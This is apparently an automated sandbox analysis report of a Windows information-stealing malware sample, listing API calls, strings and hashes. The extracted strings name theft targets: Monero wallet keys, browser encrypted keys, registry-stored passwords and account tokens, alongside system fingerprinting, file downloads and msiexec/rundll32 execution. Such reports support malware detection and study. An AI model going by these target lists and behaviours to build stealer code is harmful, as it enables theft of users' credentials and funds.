                      • Instruction Fuzzy Hash: 394173BA94020466C754F770DC47FED7238AB65704F00895AB689660C1EEBC5BC9CB96
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0047906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: a729aae8013263e62df6b2446a9a3ddda79ef6cdde96fda19e87b1abb5e7004c
                      • Instruction ID: ccf3dae6ecc145a86f074a43c2f121ac8cac2f5296177acc83325aedb57c42b0
                      • Opcode Fuzzy Hash: a729aae8013263e62df6b2446a9a3ddda79ef6cdde96fda19e87b1abb5e7004c
                      • Instruction Fuzzy Hash: 3271DE75910208ABDB04EFE4DC89FEEB7B9BF48704F14850AF516A7290DB38A905CF65
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 004731C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 0047335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 004734EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: d80802d6855dd0a23d2ca095c48af07bbcb174479468df53f22769ea7b49dc4d
                      • Instruction ID: 9e279c51d7742319016c4ccf7a7af749f50f8c1b180361274b24ab4b048bf8a8
                      • Opcode Fuzzy Hash: d80802d6855dd0a23d2ca095c48af07bbcb174479468df53f22769ea7b49dc4d
                      • Instruction Fuzzy Hash: 401243B18101089ADB15FBA1CC52FEEB738AF54304F50855FF50A66091EF382B5ACF6A
                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 00466280: InternetOpenA.WININET(00480DFE,00000001,00000000,00000000,00000000), ref: 004662E1
                        • Part of subcall function 00466280: StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 00466303
                        • Part of subcall function 00466280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00466335
                        • Part of subcall function 00466280: HttpOpenRequestA.WININET(00000000,GET,?,00E8DCF8,00000000,00000000,00400100,00000000), ref: 00466385
                        • Part of subcall function 00466280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004663BF
                        • Part of subcall function 00466280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004663D1
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00475318
                      • lstrlen.KERNEL32(00000000), ref: 0047532F
                        • Part of subcall function 00478E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00478E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00475364
                      • lstrlen.KERNEL32(00000000), ref: 00475383
                      • lstrlen.KERNEL32(00000000), ref: 004753AE
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 13c43f5fe7df8c73ecc01d66f95c7a6805e2c050017e8aacae5ad8d372bbb951
                      • Instruction ID: 2fe3e902d6bc792922afbe2e9f74344d5b77ce85c7558575e8d4d654de74190b
                      • Opcode Fuzzy Hash: 13c43f5fe7df8c73ecc01d66f95c7a6805e2c050017e8aacae5ad8d372bbb951
                      • Instruction Fuzzy Hash: 92514330910108ABCB14FF61CD92AEE7779AF50309F50841EF40E5A591EF786B56CBAB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: 581cf106cdf9f35ded2018c60a2b4e3621f3fd44cf80e0acdbb14573dee8467a
                      • Instruction ID: 2b6689e10eefd8bc022c23e885896fa8661ce6b14fd2b9135fd77e8b6b3e9d36
                      • Opcode Fuzzy Hash: 581cf106cdf9f35ded2018c60a2b4e3621f3fd44cf80e0acdbb14573dee8467a
                      • Instruction Fuzzy Hash: 5DC1A3B59001099BCB14FF60DC89FEE7379BB94304F00859EE50E67141DB78AA95CFA5
                      APIs
                        • Part of subcall function 00478DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00478E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 004742EC
                      • lstrcat.KERNEL32(?,00E8DCC8), ref: 0047430B
                      • lstrcat.KERNEL32(?,?), ref: 0047431F
                      • lstrcat.KERNEL32(?,00E8C9D0), ref: 00474333
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 00478D90: GetFileAttributesA.KERNEL32(00000000,?,00461B54,?,?,0048564C,?,?,00480E1F), ref: 00478D9F
                        • Part of subcall function 00469CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00469D39
                        • Part of subcall function 004699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004699EC
                        • Part of subcall function 004699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00469A11
                        • Part of subcall function 004699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00469A31
                        • Part of subcall function 004699C0: ReadFile.KERNEL32(000000FF,?,00000000,0046148F,00000000), ref: 00469A5A
                        • Part of subcall function 004699C0: LocalFree.KERNEL32(0046148F), ref: 00469A90
                        • Part of subcall function 004699C0: CloseHandle.KERNEL32(000000FF), ref: 00469A9A
                        • Part of subcall function 004793C0: GlobalAlloc.KERNEL32(00000000,004743DD,004743DD), ref: 004793D3
                      • StrStrA.SHLWAPI(?,00E8DB30), ref: 004743F3
                      • GlobalFree.KERNEL32(?), ref: 00474512
                        • Part of subcall function 00469AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469AEF
                        • Part of subcall function 00469AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00464EEE,00000000,?), ref: 00469B01
                        • Part of subcall function 00469AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469B2A
                        • Part of subcall function 00469AC0: LocalFree.KERNEL32(?,?,?,?,00464EEE,00000000,?), ref: 00469B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 004744A3
                      • StrCmpCA.SHLWAPI(?,004808D1), ref: 004744C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 004744D2
                      • lstrcat.KERNEL32(00000000,?), ref: 004744E5
                      • lstrcat.KERNEL32(00000000,00480FB8), ref: 004744F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: 28279776cabc1d4b6d058a3d91639426b05e1fde34f0572c290f56b89104b9c0
                      • Instruction ID: 0a98901c140edc3090691ee55678df183ff54ed2574f89fce41458141683916c
                      • Opcode Fuzzy Hash: 28279776cabc1d4b6d058a3d91639426b05e1fde34f0572c290f56b89104b9c0
                      • Instruction Fuzzy Hash: 6F7137B6900108A7CB54FBE0DC85FEE7379AB88304F04859DF60996181EB78EB55CF95
                      APIs
                        • Part of subcall function 004612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004612B4
                        • Part of subcall function 004612A0: RtlAllocateHeap.NTDLL(00000000), ref: 004612BB
                        • Part of subcall function 004612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004612D7
                        • Part of subcall function 004612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004612F5
                        • Part of subcall function 004612A0: RegCloseKey.ADVAPI32(?), ref: 004612FF
                      • lstrcat.KERNEL32(?,00000000), ref: 0046134F
                      • lstrlen.KERNEL32(?), ref: 0046135C
                      • lstrcat.KERNEL32(?,.keys), ref: 00461377
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 00478B60: GetSystemTime.KERNEL32(00480E1A,00E89FA8,004805AE,?,?,004613F9,?,0000001A,00480E1A,00000000,?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 00478B86
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00461465
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004699EC
                        • Part of subcall function 004699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00469A11
                        • Part of subcall function 004699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00469A31
                        • Part of subcall function 004699C0: ReadFile.KERNEL32(000000FF,?,00000000,0046148F,00000000), ref: 00469A5A
                        • Part of subcall function 004699C0: LocalFree.KERNEL32(0046148F), ref: 00469A90
                        • Part of subcall function 004699C0: CloseHandle.KERNEL32(000000FF), ref: 00469A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 004614EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: 5d8137543c0bf2ed232dbeb4a48b52dde378563b0e0736c8494cb45adf6226a1
                      • Instruction ID: 7e56af70f846b3dfe2bc7b7b61028d80b1d4ab14262a72d0f5d05e022d499ac7
                      • Opcode Fuzzy Hash: 5d8137543c0bf2ed232dbeb4a48b52dde378563b0e0736c8494cb45adf6226a1
                      • Instruction Fuzzy Hash: 855154B1D1011957CB15FB61DD92BEE733CAB54304F40459EB20E62091EE386B99CFAA
                      APIs
                        • Part of subcall function 004672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0046733A
                        • Part of subcall function 004672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004673B1
                        • Part of subcall function 004672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0046740D
                        • Part of subcall function 004672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00467452
                        • Part of subcall function 004672D0: HeapFree.KERNEL32(00000000), ref: 00467459
                      • lstrcat.KERNEL32(00000000,004817FC), ref: 00467606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00467648
                      • lstrcat.KERNEL32(00000000, : ), ref: 0046765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 0046768F
                      • lstrcat.KERNEL32(00000000,00481804), ref: 004676A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 004676D3
                      • lstrcat.KERNEL32(00000000,00481808), ref: 004676ED
                      • task.LIBCPMTD ref: 004676FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                      • String ID: :
                      • API String ID: 2677904052-3653984579
                      • Opcode ID: 4de6a26af43400352b5a83940b09ab4975e8d668481999a0cf4724fc338fd541
                      • Instruction ID: 6b15ab5fc1ace41a475f91619ed96a094a849e6a0a5a92838f6c587c8a159388
                      • Opcode Fuzzy Hash: 4de6a26af43400352b5a83940b09ab4975e8d668481999a0cf4724fc338fd541
                      • Instruction Fuzzy Hash: 16316B71A00109DBCB08FBE5DC95DFE737ABB45305B14551EE102A72A0EB38A942CF66
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E8DA10,00000000,?,00480E2C,00000000,?,00000000), ref: 00478130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00478137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00478158
                      • __aulldiv.LIBCMT ref: 00478172
                      • __aulldiv.LIBCMT ref: 00478180
                      • wsprintfA.USER32 ref: 004781AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2774356765-3474575989
                      • Opcode ID: af2b59f69bd8a45b7adcddad919524f0c41d6fa9ca7792cceefdaa81e021ce07
                      • Instruction ID: 4784acecd9d57207d80e8e9865fbd68bb60a9e09460a3dbc8bb590dbe8701a64
                      • Opcode Fuzzy Hash: af2b59f69bd8a45b7adcddad919524f0c41d6fa9ca7792cceefdaa81e021ce07
                      • Instruction Fuzzy Hash: 23210EB1D44218ABDB00DFD5CC49FAEB779FB44B14F10851AF605BB280D77869018BA9
                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00464839
                        • Part of subcall function 004647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00464849
                      • InternetOpenA.WININET(00480DF7,00000001,00000000,00000000,00000000), ref: 0046610F
                      • StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 00466147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0046618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004661B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 004661DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0046620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00466249
                      • InternetCloseHandle.WININET(?), ref: 00466253
                      • InternetCloseHandle.WININET(00000000), ref: 00466260
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 2507841554-0
                      • Opcode ID: 973c3ea6f3f7b999bf3fb7c0630d42af7b76418b304d2b5eb91d0512b1fe1596
                      • Instruction ID: 456b947ae918bb55dc7e7c0108a6835d5ba4f3e61a29b63a28b14e24b28a3f68
                      • Opcode Fuzzy Hash: 973c3ea6f3f7b999bf3fb7c0630d42af7b76418b304d2b5eb91d0512b1fe1596
                      • Instruction Fuzzy Hash: B151A8B1900218ABDF20EF90CC45BEF7779FB44305F10849AB605A71C0EB78AA85CF5A
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0046733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004673B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0046740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00467452
                      • HeapFree.KERNEL32(00000000), ref: 00467459
                      • task.LIBCPMTD ref: 00467555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuetask
                      • String ID: Password
                      • API String ID: 775622407-3434357891
                      • Opcode ID: 5372b32669840a926ca3118bc2d6069ee75be04c56f8bbfee4a63143b0460599
                      • Instruction ID: 48fc46eff5e0435770fe4509d71f688159ab422c1701c27c0bc9b52fae7f562b
                      • Opcode Fuzzy Hash: 5372b32669840a926ca3118bc2d6069ee75be04c56f8bbfee4a63143b0460599
                      • Instruction Fuzzy Hash: 78616FB580411C9BDB24DB50CC55BDAB7B8BF44304F0085EAE649A6241EF746FC9CF96
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                      • lstrlen.KERNEL32(00000000), ref: 0046BC9F
                        • Part of subcall function 00478E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00478E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0046BCCD
                      • lstrlen.KERNEL32(00000000), ref: 0046BDA5
                      • lstrlen.KERNEL32(00000000), ref: 0046BDB9
                      Strings
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: 591d0499307d4fe54a8bc5b2e222dd0ccdf3fccec72c13b51f8f3f189074c871
                      • Instruction ID: a4a9d1e7913353b9e2a528aa54a9e2262e657f208afa24f52c55bd27e171e6f4
                      • Opcode Fuzzy Hash: 591d0499307d4fe54a8bc5b2e222dd0ccdf3fccec72c13b51f8f3f189074c871
                      • Instruction Fuzzy Hash: D9B153719101049BDB04FBA1CD56EEE7339AF94304F40851FF50AA6191EF386A69CBBB
                      APIs
                      Strings
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: b6663c45426f3309c54188021e4020df16b4822ddcf0a68355e7a050ca859deb
                      • Instruction ID: 2c97de14684d2d53e1248e6507fc656c545437111bbfad723ee5d98e42afbf46
                      • Opcode Fuzzy Hash: b6663c45426f3309c54188021e4020df16b4822ddcf0a68355e7a050ca859deb
                      • Instruction Fuzzy Hash: BCF03A34904209EFD384AFE0E90977D7B72FB06703F04019EE60986290D774AE51DF96
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00464FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00464FD1
                      • InternetOpenA.WININET(00480DDF,00000000,00000000,00000000,00000000), ref: 00464FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00465011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00465041
                      • InternetCloseHandle.WININET(?), ref: 004650B9
                      • InternetCloseHandle.WININET(?), ref: 004650C6
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: b44e183d9b67ccd6265539b01a89caea1c0ab67cefb4977eb094ef3403ae4921
                      • Instruction ID: ed2c599e868ebd631fa47ac900a6e7947ceb9c65194e7e084936c7fa26023389
                      • Opcode Fuzzy Hash: b44e183d9b67ccd6265539b01a89caea1c0ab67cefb4977eb094ef3403ae4921
                      • Instruction Fuzzy Hash: 8E3108B4A00218ABDB20DF94DC85BDDB7B5EB48704F1081DAEA09A7281D7746EC5CF99
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00478426
                      • wsprintfA.USER32 ref: 00478459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0047847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0047848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00478499
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                      • RegQueryValueExA.ADVAPI32(00000000,00E8D938,00000000,000F003F,?,00000400), ref: 004784EC
                      • lstrlen.KERNEL32(?), ref: 00478501
                      • RegQueryValueExA.ADVAPI32(00000000,00E8D9F8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00480B34), ref: 00478599
                      • RegCloseKey.ADVAPI32(00000000), ref: 00478608
                      • RegCloseKey.ADVAPI32(00000000), ref: 0047861A
                      Strings
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: b11ae06f6f40b8f7a10ab20d83793af282d7dd18ce34607ed0c2cf44a5a9991b
                      • Instruction ID: 8d437411e6a9155a042d296c66aba4ed6d9bf03c54ebf260c29c7284c754596b
                      • Opcode Fuzzy Hash: b11ae06f6f40b8f7a10ab20d83793af282d7dd18ce34607ed0c2cf44a5a9991b
                      • Instruction Fuzzy Hash: 99212771940218ABDB24DB54CC85FE9B3B9FB48700F00C5DAE609A6240DF75AA85CFE8
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004776A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 004776AB
                      • RegOpenKeyExA.ADVAPI32(80000002,00E7BCE8,00000000,00020119,00000000), ref: 004776DD
                      • RegQueryValueExA.ADVAPI32(00000000,00E8D908,00000000,00000000,?,000000FF), ref: 004776FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 00477708
                      Strings
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: 8f7590db52af335cbb6b918a840ddfc713a07414e1ae9c23fdea374bda2a7d8a
                      • Instruction ID: 690980cac9dd5471e626819994999d3aa72dd72c774b51a673e2b0f7daaa6dfd
                      • Opcode Fuzzy Hash: 8f7590db52af335cbb6b918a840ddfc713a07414e1ae9c23fdea374bda2a7d8a
                      • Instruction Fuzzy Hash: 38018FB8A00204BBDB00EBE4DD49FAEB7B9EB48701F008456FA05D7290D778B904CF55
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0047773B
                      • RegOpenKeyExA.ADVAPI32(80000002,00E7BCE8,00000000,00020119,004776B9), ref: 0047775B
                      • RegQueryValueExA.ADVAPI32(004776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0047777A
                      • RegCloseKey.ADVAPI32(004776B9), ref: 00477784
                      Strings
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: bf5bce400ffeb2b7fd448b658119d4515ba8203642f2d55fa8f0dfd9153969b9
                      • Instruction ID: 2640b826bcb3501b8b6709b0c4d473a3151af336725531a9a1e267f443716b98
                      • Opcode Fuzzy Hash: bf5bce400ffeb2b7fd448b658119d4515ba8203642f2d55fa8f0dfd9153969b9
                      • Instruction Fuzzy Hash: 840121B9A40208BBDB00EBE0DC49FAEB7B9EB44701F10455AFA05A6281DB74A500CF51
                      APIs
                      • CreateFileA.KERNEL32(:G,80000000,00000003,00000000,00000003,00000080,00000000,?,00473AEE,?), ref: 004792FC
                      • GetFileSizeEx.KERNEL32(000000FF,:G), ref: 00479319
                      • CloseHandle.KERNEL32(000000FF), ref: 00479327
                      Strings
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :G$:G
                      • API String ID: 1378416451-4278336346
                      • Opcode ID: 1fb9456c85df59f14a230794e4da31cdf51ef812b5d9958edd981d2edc79b165
                      • Instruction ID: 500141bce29bbf8f19a6fe824c3df3d6f464e5b3af7e5c66c0951ab85d08c6f9
                      • Opcode Fuzzy Hash: 1fb9456c85df59f14a230794e4da31cdf51ef812b5d9958edd981d2edc79b165
                      • Instruction Fuzzy Hash: AEF03139E40204BBDB10DFF0DC45B9E77B9AB48750F10C195B955A72D0D678AA01CF45
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004699EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00469A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00469A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,0046148F,00000000), ref: 00469A5A
                      • LocalFree.KERNEL32(0046148F), ref: 00469A90
                      • CloseHandle.KERNEL32(000000FF), ref: 00469A9A
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 0b43392e62828c2c823e1099c9987513e9b20725477561c3c5c686b134368e23
                      • Instruction ID: 6a71a9d1c1637e4553d90138632fcdb4a0d7b569a0b5986ca4cb74fd31a577e6
                      • Opcode Fuzzy Hash: 0b43392e62828c2c823e1099c9987513e9b20725477561c3c5c686b134368e23
                      • Instruction Fuzzy Hash: B531F3B4A00209EFDB14DFD4C885BAE77F9BF49300F108159E911AB390D778AA41CFA6
                      APIs
                      • lstrcat.KERNEL32(?,00E8DCC8), ref: 004747DB
                        • Part of subcall function 00478DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00478E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00474801
                      • lstrcat.KERNEL32(?,?), ref: 00474820
                      • lstrcat.KERNEL32(?,?), ref: 00474834
                      • lstrcat.KERNEL32(?,00E7B068), ref: 00474847
